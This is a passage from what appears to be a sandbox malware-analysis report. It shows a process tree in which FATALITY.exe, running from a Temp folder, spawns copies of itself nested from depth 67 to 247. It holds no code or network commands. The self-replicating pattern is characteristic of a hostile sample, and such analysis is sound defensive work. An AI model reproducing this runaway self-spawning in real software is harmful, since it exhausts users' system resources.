        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        67⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        68⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        69⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        70⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        71⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        72⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        73⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        74⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        75⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        76⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        77⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        78⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        79⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        80⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        81⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        82⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        83⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        84⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        85⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        86⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        87⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        88⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        89⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        90⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        91⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        92⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        93⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        94⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        95⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        96⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        97⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        98⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        99⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        100⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        101⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        102⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        103⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        104⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        105⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        106⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        107⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        108⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        109⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        110⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        111⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        112⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        113⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        114⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        115⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        116⤵
        
        PID:4860
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        117⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        118⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        119⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        120⤵
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        121⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        122⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        123⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        124⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        125⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        126⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        127⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        128⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        129⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        130⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        131⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        132⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        133⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        134⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        135⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        136⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        137⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        138⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        139⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        140⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        141⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        142⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        143⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        144⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        145⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        146⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        147⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        148⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        149⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        150⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        151⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        152⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        153⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        154⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        155⤵
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        156⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        157⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        158⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        159⤵
        
        PID:824
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        160⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        161⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        162⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        163⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        164⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        165⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        166⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        167⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        168⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        169⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        170⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        171⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        172⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        173⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        174⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        175⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        176⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        177⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        178⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        179⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        180⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        181⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        182⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        183⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        184⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        185⤵
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        186⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        187⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        188⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        189⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        190⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        191⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        192⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        193⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        194⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        195⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        196⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        197⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        198⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        199⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        200⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        201⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        202⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        203⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        204⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        205⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        206⤵
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        207⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        208⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        209⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        210⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        211⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        212⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        213⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        214⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        215⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        216⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        217⤵
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        218⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        219⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        220⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        221⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        222⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        223⤵
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        224⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        225⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        226⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        227⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        228⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        229⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        230⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        231⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        232⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        233⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        234⤵
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        235⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        236⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        237⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        238⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        239⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        240⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        241⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        242⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        243⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        244⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        245⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        246⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        247⤵
        
        PID:2588
        
